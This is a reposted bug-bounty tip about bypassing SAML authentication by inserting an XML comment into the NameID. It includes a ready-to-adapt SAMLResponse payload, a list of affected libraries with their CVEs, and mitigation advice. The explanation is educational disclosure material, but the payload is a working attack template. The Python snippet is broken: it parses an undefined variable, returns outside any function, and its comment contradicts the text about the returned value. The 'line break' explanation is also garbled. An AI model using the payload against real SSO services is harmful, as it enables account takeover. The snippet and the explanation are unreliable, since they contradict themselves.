Bounty Tip: How to bypass authorization in SAML !

[Nytro]

Bounty Tip: How to bypass authorization in SAML !

Shaurya Sharma

 

Apr 3 · 2 min read

 

 

Security Assertion Markup Language (SAML) is an open XML-based standard for exchanging authentication and authorization data between process parties Vulnerabilities are affected by the decisions of various SSO providers and several libraries using SAML SSO (Single Sign-On).

(Security Assertion Markup Language) SAML

Using the SAML protocol, users can access many of their cloud applications with just one username and password. Single Sign-On (SSO) is a common technology that allows you to log in to a web application through a “third party” as a third-party web application.It is in this implementation that an error lies that allows an attacker to place a comment inside the username field, the only condition is the presence of a valid username.

The problem lies in the comment processing method in the XML markup. When you place a comment code in the username field, a line break occurs. When processing a user name, the preprocessor “cuts off” the value after the comment field and does not take it into account when checking:

import xml.etree.ElementTree as et
doc = "<NameID>test<!-- comment -->user</NameID>"
data = et.fromstring(payload)
return data.text # returns 'testuser'

• The expected value is “testuser”, but after the “break” only the value of “test” will be returned.
• An example of the implementation of this attack by a user with access to the user@user.com.evil.com account can change SAML to replace NameID with user@user.com during SP processing:

<SAMLResponse>
    <Issuer>https://idp.com/</Issuer>
    <Assertion ID="_id1234">
        <Subject>
            <NameID>user@user.com<!---->.evil.com</NameID>
        </Subject>
    </Assertion>
    <Signature>
        <SignedInfo>
            <CanonicalizationMethod Algorithm="xml-c14n11"/>
            <Reference URI="#_id1234"/>
        </SignedInfo>
        <SignatureValue>
            some base64 data that represents the signature of the assertion
        </SignatureValue>
    </Signature>
</SAMLResponse>

The following solutions are subject to this attack:

• OneLogin — python-saml — CVE-2017–11427
• OneLogin — ruby-saml — CVE-2017–11428
• Clever — saml2-js — CVE-2017–11429
• OmniAuth-SAML — CVE-2017–11430
• Shibboleth — CVE-2018–0489
• Duo Network Gateway — CVE-2018–7340

It is worth noting that the attack does not work against accounts protected by two-factor authentication (which is included in ~ 10% of users according to Google statistics).

To prevent such attacks, it is necessary to update the libraries used, disable the public registration of user accounts in important networks, or abandon the canonicalization algorithm that does not skip comments.

#HappyHunting #BugBountyTips

Sursa: https://medium.com/bugbountywriteup/bounty-tip-how-to-bypass-authorization-in-saml-f7577a6541c4